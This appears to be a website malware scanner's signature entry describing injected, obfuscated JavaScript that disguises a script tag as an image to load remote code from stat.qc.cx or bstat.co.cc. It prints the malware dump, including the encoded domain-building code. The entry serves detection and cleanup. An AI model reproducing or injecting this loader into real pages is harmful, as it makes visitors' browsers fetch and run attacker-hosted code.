malware-entry-mwjs1306

Description: Javascript encoded and hidden inside a web page. It disguises itself as an image to make it harder to detect. It sets the img variable as the name "script" and then creates as fake "img" src, to load malware from a .qc.cx or .cc domain.

Domains used:


stat.qc.cx

bstat.co.cc

Affecting: Any web site (no traffic specified)

Clean up: Request support here (or sign up here).

Malware dump:


<script language="javascript type="text/javascript">var img=script;var EXid='tat';EXc=document;..
var EXcsrv="s"+EXid+String.fromCharCode(46,113,99,46,99,120,47)+'adj'+'s.j';EXc.write('<'+ img +' type="text/javascript"
src="http://"+EXcsrv+'s"></'+img+'>;');

SiteCheck Signatures